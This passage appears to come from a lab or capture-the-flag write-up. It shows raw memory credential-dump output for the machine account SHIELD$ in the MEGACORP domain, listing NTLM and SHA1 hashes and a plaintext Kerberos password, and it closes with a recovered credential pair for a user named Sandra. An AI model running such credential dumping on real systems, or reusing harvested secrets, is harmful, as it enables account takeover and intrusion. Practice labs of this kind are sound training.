Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 65711 (00000000:000100af) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 5/4/2020 10:19:01 PM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE& ssp : credman : Authentication Id : 0 ; 65691 (00000000:0001009b) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 5/4/2020 10:19:01 PM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE& ssp : credman : Authentication Id : 0 ; 36390 (00000000:00008e26) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 5/4/2020 10:19:00 PM SID : msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : SHIELD$ Domain : MEGACORP Logon Server : (null) Logon Time : 5/4/2020 10:19:00 PM SID : S-1-5-18 msv : tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : shield$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE& ssp : credman :
Result: Credentials
Sandra:Password1234!
.
Last updated